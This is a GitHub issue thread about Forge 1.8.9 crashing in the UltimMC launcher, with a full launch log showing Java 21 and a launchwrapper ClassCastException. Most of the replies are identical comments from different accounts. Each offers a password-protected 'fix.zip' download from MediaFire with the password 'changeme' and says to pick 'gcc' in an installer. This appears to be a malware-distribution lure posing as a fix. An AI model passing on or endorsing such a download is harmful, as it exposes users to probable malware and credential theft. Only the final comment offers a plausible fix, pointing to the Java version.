### ISSUE TITLE
Forge crashing when launching 1.8.9

### ISSUE THREAD

**Issue by Lyfe-a** [UltimMC/Launcher#381]
### Description of bug

It crashes.

### Steps to reproduce

* install forge
* launch
* crash

### Suspected cause

UltimMC version: 0.7.0-custom

Launched instance in online mode

authserver.mojang.com resolves to:
    [N/A]

session.minecraft.net resolves to:
    [2620:1ec:bdf::73, 13.107.246.73]

textures.minecraft.net resolves to:
    [2620:1ec:bdf::73, 13.107.246.73]

api.mojang.com resolves to:
    [2620:1ec:bdf::73, 13.107.246.73]

Minecraft folder is:
C:/Users/Administrator/Desktop/mmc-cracked-win32/UltimMC/instances/1.8.9/.minecraft

Java path is:
C:/Program Files/Java/jdk-21/bin/javaw.exe

Checking Java version...
Java is version 21.0.3, using 64-bit architecture, from Oracle Corporation.

Main Class:
  net.minecraft.launchwrapper.Launch

Native path:
  C:/Users/Administrator/Desktop/mmc-cracked-win32/UltimMC/instances/1.8.9/natives

Libraries:
  C:/Users/Administrator/Desktop/mmc-cracked-win32/UltimMC/libraries/com/mojang/netty/1.8.8/netty-1.8.8.jar
  C:/Users/Administrator/Desktop/mmc-cracked-win32/UltimMC/libraries/oshi-project/oshi-core/1.1/oshi-core-1.1.jar
  C:/Users/Administrator/Desktop/mmc-cracked-win32/UltimMC/libraries/net/java/dev/jna/jna/3.4.0/jna-3.4.0.jar
  C:/Users/Administrator/Desktop/mmc-cracked-win32/UltimMC/libraries/net/java/dev/jna/platform/3.4.0/platform-3.4.0.jar
  C:/Users/Administrator/Desktop/mmc-cracked-win32/UltimMC/libraries/com/ibm/icu/icu4j-core-mojang/51.2/icu4j-core-mojang-51.2.jar
  C:/Users/Administrator/Desktop/mmc-cracked-win32/UltimMC/libraries/net/sf/jopt-simple/jopt-simple/4.6/jopt-simple-4.6.jar
  C:/Users/Administrator/Desktop/mmc-cracked-win32/UltimMC/libraries/com/paulscode/codecjorbis/20101023/codecjorbis-20101023.jar
  C:/Users/Administrator/Desktop/mmc-cracked-win32/UltimMC/libraries/com/paulscode/codecwav/20101023/codecwav-20101023.jar
  C:/Users/Administrator/Desktop/mmc-cracked-win32/UltimMC/libraries/com/paulscode/libraryjavasound/20101123/libraryjavasound-20101123.jar
  C:/Users/Administrator/Desktop/mmc-cracked-win32/UltimMC/libraries/com/paulscode/librarylwjglopenal/20100824/librarylwjglopenal-20100824.jar
  C:/Users/Administrator/Desktop/mmc-cracked-win32/UltimMC/libraries/com/paulscode/soundsystem/20120107/soundsystem-20120107.jar
  C:/Users/Administrator/Desktop/mmc-cracked-win32/UltimMC/libraries/io/netty/netty-all/4.0.23.Final/netty-all-4.0.23.Final.jar
  C:/Users/Administrator/Desktop/mmc-cracked-win32/UltimMC/libraries/com/google/guava/guava/17.0/guava-17.0.jar
  C:/Users/Administrator/Desktop/mmc-cracked-win32/UltimMC/libraries/org/apache/commons/commons-lang3/3.3.2/commons-lang3-3.3.2.jar
  C:/Users/Administrator/Desktop/mmc-cracked-win32/UltimMC/libraries/commons-io/commons-io/2.4/commons-io-2.4.jar
  C:/Users/Administrator/Desktop/mmc-cracked-win32/UltimMC/libraries/commons-codec/commons-codec/1.9/commons-codec-1.9.jar
  C:/Users/Administrator/Desktop/mmc-cracked-win32/UltimMC/libraries/com/google/code/gson/gson/2.2.4/gson-2.2.4.jar
  C:/Users/Administrator/Desktop/mmc-cracked-win32/UltimMC/libraries/com/mojang/authlib/1.5.21/authlib-1.5.21.jar
  C:/Users/Administrator/Desktop/mmc-cracked-win32/UltimMC/libraries/com/mojang/realms/1.7.59/realms-1.7.59.jar
  C:/Users/Administrator/Desktop/mmc-cracked-win32/UltimMC/libraries/org/apache/commons/commons-compress/1.8.1/commons-compress-1.8.1.jar
  C:/Users/Administrator/Desktop/mmc-cracked-win32/UltimMC/libraries/org/apache/httpcomponents/httpclient/4.3.3/httpclient-4.3.3.jar
  C:/Users/Administrator/Desktop/mmc-cracked-win32/UltimMC/libraries/commons-logging/commons-logging/1.1.3/commons-logging-1.1.3.jar
  C:/Users/Administrator/Desktop/mmc-cracked-win32/UltimMC/libraries/org/apache/httpcomponents/httpcore/4.3.2/httpcore-4.3.2.jar
  C:/Users/Administrator/Desktop/mmc-cracked-win32/UltimMC/libraries/org/apache/logging/log4j/log4j-api/2.0-beta9-fixed/log4j-api-2.0-beta9-fixed.jar
  C:/Users/Administrator/Desktop/mmc-cracked-win32/UltimMC/libraries/org/apache/logging/log4j/log4j-core/2.0-beta9-fixed/log4j-core-2.0-beta9-fixed.jar
  C:/Users/Administrator/Desktop/mmc-cracked-win32/UltimMC/libraries/tv/twitch/twitch/6.5/twitch-6.5.jar
  C:/Users/Administrator/Desktop/mmc-cracked-win32/UltimMC/libraries/net/java/jinput/jinput/2.0.5/jinput-2.0.5.jar
  C:/Users/Administrator/Desktop/mmc-cracked-win32/UltimMC/libraries/net/java/jutils/jutils/1.0.0/jutils-1.0.0.jar
  C:/Users/Administrator/Desktop/mmc-cracked-win32/UltimMC/libraries/org/lwjgl/lwjgl/lwjgl/2.9.4-nightly-20150209/lwjgl-2.9.4-nightly-20150209.jar
  C:/Users/Administrator/Desktop/mmc-cracked-win32/UltimMC/libraries/org/lwjgl/lwjgl/lwjgl_util/2.9.4-nightly-20150209/lwjgl_util-2.9.4-nightly-20150209.jar
  C:/Users/Administrator/Desktop/mmc-cracked-win32/UltimMC/libraries/net/minecraftforge/forge/1.8.9-11.15.0.1656/forge-1.8.9-11.15.0.1656-universal.jar
  C:/Users/Administrator/Desktop/mmc-cracked-win32/UltimMC/libraries/net/minecraft/launchwrapper/1.12/launchwrapper-1.12.jar
  C:/Users/Administrator/Desktop/mmc-cracked-win32/UltimMC/libraries/org/ow2/asm/asm-all/5.0.3/asm-all-5.0.3.jar
  C:/Users/Administrator/Desktop/mmc-cracked-win32/UltimMC/libraries/jline/jline/2.13/jline-2.13.jar
  C:/Users/Administrator/Desktop/mmc-cracked-win32/UltimMC/libraries/com/typesafe/akka/akka-actor_2.11/2.3.3/akka-actor_2.11-2.3.3.jar
  C:/Users/Administrator/Desktop/mmc-cracked-win32/UltimMC/libraries/com/typesafe/config/1.2.1/config-1.2.1.jar
  C:/Users/Administrator/Desktop/mmc-cracked-win32/UltimMC/libraries/org/scala-lang/scala-actors-migration_2.11/1.1.0/scala-actors-migration_2.11-1.1.0.jar
  C:/Users/Administrator/Desktop/mmc-cracked-win32/UltimMC/libraries/org/scala-lang/scala-compiler/2.11.1/scala-compiler-2.11.1.jar
  C:/Users/Administrator/Desktop/mmc-cracked-win32/UltimMC/libraries/org/scala-lang/plugins/scala-continuations-library_2.11/1.0.2/scala-continuations-library_2.11-1.0.2.jar
  C:/Users/Administrator/Desktop/mmc-cracked-win32/UltimMC/libraries/org/scala-lang/plugins/scala-continuations-plugin_2.11.1/1.0.2/scala-continuations-plugin_2.11.1-1.0.2.jar
  C:/Users/Administrator/Desktop/mmc-cracked-win32/UltimMC/libraries/org/scala-lang/scala-library/2.11.1/scala-library-2.11.1.jar
  C:/Users/Administrator/Desktop/mmc-cracked-win32/UltimMC/libraries/org/scala-lang/scala-parser-combinators_2.11/1.0.1/scala-parser-combinators_2.11-1.0.1.jar
  C:/Users/Administrator/Desktop/mmc-cracked-win32/UltimMC/libraries/org/scala-lang/scala-reflect/2.11.1/scala-reflect-2.11.1.jar
  C:/Users/Administrator/Desktop/mmc-cracked-win32/UltimMC/libraries/org/scala-lang/scala-swing_2.11/1.0.1/scala-swing_2.11-1.0.1.jar
  C:/Users/Administrator/Desktop/mmc-cracked-win32/UltimMC/libraries/org/scala-lang/scala-xml_2.11/1.0.2/scala-xml_2.11-1.0.2.jar
  C:/Users/Administrator/Desktop/mmc-cracked-win32/UltimMC/libraries/lzma/lzma/0.0.1/lzma-0.0.1.jar
  C:/Users/Administrator/Desktop/mmc-cracked-win32/UltimMC/libraries/java3d/vecmath/1.5.2/vecmath-1.5.2.jar
  C:/Users/Administrator/Desktop/mmc-cracked-win32/UltimMC/libraries/net/sf/trove4j/trove4j/3.0.3/trove4j-3.0.3.jar
  C:/Users/Administrator/Desktop/mmc-cracked-win32/UltimMC/libraries/com/mojang/minecraft/1.8.9/minecraft-1.8.9-client.jar

Native libraries:
  C:/Users/Administrator/Desktop/mmc-cracked-win32/UltimMC/libraries/net/java/jinput/jinput-platform/2.0.5/jinput-platform-2.0.5-natives-windows.jar
  C:/Users/Administrator/Desktop/mmc-cracked-win32/UltimMC/libraries/org/lwjgl/lwjgl/lwjgl-platform/2.9.4-nightly-20150209/lwjgl-platform-2.9.4-nightly-20150209-natives-windows.jar
  C:/Users/Administrator/Desktop/mmc-cracked-win32/UltimMC/libraries/tv/twitch/twitch-platform/6.5/twitch-platform-6.5-natives-windows-64.jar
  C:/Users/Administrator/Desktop/mmc-cracked-win32/UltimMC/libraries/tv/twitch/twitch-external-platform/4.5/twitch-external-platform-4.5-natives-windows-64.jar

Params:
  --username LyfeTheClown --version 1.8.9 --gameDir C:/Users/Administrator/Desktop/mmc-cracked-win32/UltimMC/instances/1.8.9/.minecraft --assetsDir C:/Users/Administrator/Desktop/mmc-cracked-win32/UltimMC/assets --assetIndex 1.8 --uuid <PROFILE ID> --accessToken  --userProperties {} --userType local --tweakClass net.minecraftforge.fml.common.launcher.FMLTweaker

Window size: 854 x 480

Java Arguments:
[-XX:HeapDumpPath=MojangTricksIntelDriversForPerformance_javaw.exe_minecraft.exe.heapdump, -Xms512m, -Xmx1024m, -Duser.language=en, -javaagent:C:/Users/Administrator/Desktop/mmc-cracked-win32/UltimMC/injectors/authlib-injector-1.2.5.jar=http://localhost:1698, -Dauthlibinjector.noShowServerName]

Minecraft process ID: 5892

[authlib-injector] [INFO] Logging file: C:\Users\Administrator\Desktop\mmc-cracked-win32\UltimMC\instances\1.8.9\.minecraft\authlib-injector.log
[authlib-injector] [INFO] Version: 1.2.5
[authlib-injector] [INFO] Authentication server: http://localhost:1698
[authlib-injector] [WARNING] You are using HTTP protocol, which is INSECURE! Please switch to HTTPS if possible.
Using onesix launcher.

Failed to start Minecraft:
java.lang.ClassCastException: class jdk.internal.loader.ClassLoaders$AppClassLoader cannot be cast to class java.net.URLClassLoader (jdk.internal.loader.ClassLoaders$AppClassLoader and java.net.URLClassLoader are in module java.base of loader 'bootstrap')
	at net.minecraft.launchwrapper.Launch.<init>(Launch.java:34)
	at net.minecraft.launchwrapper.Launch.main(Launch.java:28)
	at java.base/jdk.internal.reflect.DirectMethodHandleAccessor.invoke(DirectMethodHandleAccessor.java:103)
	at java.base/java.lang.reflect.Method.invoke(Method.java:580)
	at org.multimc.onesix.OneSixLauncher.launchWithMainClass(OneSixLauncher.java:243)
	at org.multimc.onesix.OneSixLauncher.launch(OneSixLauncher.java:278)
	at org.multimc.EntryPoint.listen(EntryPoint.java:143)
	at org.multimc.EntryPoint.main(EntryPoint.java:34)
Exiting with -1
Process exited with exit code -1 (0xffffffffffffffff).
Please note that usually neither the exit code, nor its description are enough to diagnose issues!
Always upload the entire log and not just the exit code.
Clipboard copy at: 26 Aug 2024 13:13:38 +0800

### This issue is unique

- [X] I have searched the issue tracker and did not find an issue describing my bug.

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Lyfe-a** [comment]
Forgot to mention im using Windows.

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ShawnFoxter** [comment]
make sure you're using the appropiate version of Java
